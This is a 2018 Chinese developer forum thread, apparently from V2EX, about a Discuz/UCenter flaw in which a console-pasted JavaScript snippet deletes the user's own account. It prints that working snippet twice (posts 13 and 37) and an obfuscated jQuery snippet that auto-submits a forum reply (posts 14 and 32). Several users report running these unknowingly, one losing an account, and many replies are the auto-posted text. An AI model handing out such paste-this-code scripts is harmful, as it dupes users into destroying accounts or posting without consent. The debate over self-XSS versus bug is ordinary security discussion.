1
Event OP 具体账号发生了什么神奇的变化。。 你们自己试试看吧 我很无奈 。。
|
2
Event OP 而且貌似不是软层的。。。直接从 sql 层干掉了?
|
3
Event OP 哦对。。输完后退出帐号 重新登录才能看到效果
|
5
suit 2018-11-11 23:29:37 +08:00
没有变化
|
9
Event OP @suit 我在 dz 的 oschina 里面找到了 issue。。。貌似是个 ucenter 的 bug
|
12
ScotGu 2018-11-11 23:47:01 +08:00
|
13
t6attack 2018-11-11 23:47:50 +08:00
location['href'] = ((d = (await(await fetch("./home.php?mod=spacecp&ac=avatar", {
credentials: 'include' }))['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')) && confirm('绿宝石')) ? d : ''; |
14
t6attack 2018-11-11 23:57:12 +08:00
让用户自己执行动作代码,这,,这算漏洞?!下面代码可以在 v2 执行
$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"](); |
15
mengyaoss77 2018-11-12 00:01:33 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
16
dot2017 2018-11-12 00:01:37 +08:00 1
这个 bug 老早就有了,利用 uc 头像删除自己的账号。临时解决办法是切换到 H5 头像模式,X3.4 自带了
|
18
Event OP @mengyaoss77 是程序权限没控制好
|
19
Perry 2018-11-12 00:03:48 +08:00 via iPhone
这是 social engineering 不是 bug
|
20
mengyaoss77 2018-11-12 00:04:41 +08:00
@Event #18 这是我执行 14 楼的代码自动回复的
|
22
airyland 2018-11-12 00:33:03 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
23
airyland 2018-11-12 00:34:07 +08:00
试了楼上的代码,自动发出回复了。。
|
24
crab 2018-11-12 00:38:22 +08:00
|
25
crab 2018-11-12 00:38:36 +08:00 3
|
26
KasuganoSoras 2018-11-12 03:46:02 +08:00 via Android
这个 bug 老早就有了,我成功删了自己在很多论坛的账号。
不过我现在都自己开发论坛了,不用 Discuz |
27
kzfile 2018-11-12 07:55:46 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
28
murmur 2018-11-12 08:09:25 +08:00
为什么那么多网站都在 console 里打东西提醒用户不要执行陌生人发来的代码
|
29
ThirdFlame 2018-11-12 08:41:49 +08:00
人肉型 CSRF
|
30
lixueyu001 2018-11-12 08:45:24 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
31
bojackhorseman 2018-11-12 08:49:18 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
32
v9ex 2018-11-12 08:51:32 +08:00
$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"]();
|
33
Removable 2018-11-12 08:57:24 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
34
respect11 2018-11-12 08:58:39 +08:00 via iPhone
所以你们到底嫌 JS 权限太大还是太小了??
|
35
s527332935 2018-11-12 09:07:54 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
36
Lebal 2018-11-12 09:14:33 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
37
FakeLeung 2018-11-12 09:16:14 +08:00
location['href']=(
(d=(await(await fetch("./home.php?mod=spacecp&ac=avatar", {credentials: 'include'})['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')&&confirm('绿宝石'))?d:''; 来来来,大神们分析一下,这是 js 的问题还是后端的问题? @respect11 @Removable @bojackhorseman @lixueyu001 @airyland |
38
autoxbc 2018-11-12 09:38:44 +08:00
其实是人的问题,在微利下人就失去理智,罔顾不懂的事情不要做的常识,跟技术没半点关系
|
39
crystom 2018-11-12 10:22:43 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
40
cookii 2018-11-12 11:36:31 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
41
exceloo 2018-11-12 11:38:54 +08:00
这和 js 有半毛钱关系,只是诱导用户自己去删除帐号罢了。前端发的请求,js 都能模拟,用户自己作死去跑莫名其妙的代码你再牛逼也防不住啊。客户端执行的,又不是在服务端,还能咋办
|
42
simple11 2018-11-12 11:43:36 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
44
hero2040407 2018-11-12 12:50:18 +08:00
所以说删除用户这种操作需要一个提醒吧,点一下就直接删掉了?
|
46
coolloves 2018-11-12 13:19:52 +08:00
我擦,楼主好歹说下,运行的后果啊,我刚运行了下把我的账号给删掉了..................
|
47
onionnews 2018-11-12 15:44:47 +08:00
想利用这个代码删掉那些论坛账号的,但是我执行了不管用,跳转到 500 了。是程序版本问题?
|
48
kn007 2018-11-12 15:51:41 +08:00
好久前就见过了,DZ 一直没修复。
|
49
roryzh 2018-11-12 16:08:09 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
50
Jiaming 2018-11-13 09:00:23 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
51
roryzh 2018-11-13 17:16:15 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
52
Fakey2 2018-12-07 12:21:48 +08:00
这不是漏洞,这只是诱导类似钓鱼了,安全意识薄弱的人才会上当,根本也不是 DZ 本身的漏洞。。。我让你在 console 执行你就执行,这不是傻子行为么。。。所以跟 DZ 本身没关系。。。
|
53
xemtof 2019-01-09 18:59:34 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
54
771456556 2019-05-16 10:27:08 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
55
xmdhs 2020-02-26 22:17:41 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|
56
binnerchen 2020-11-29 13:10:48 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
|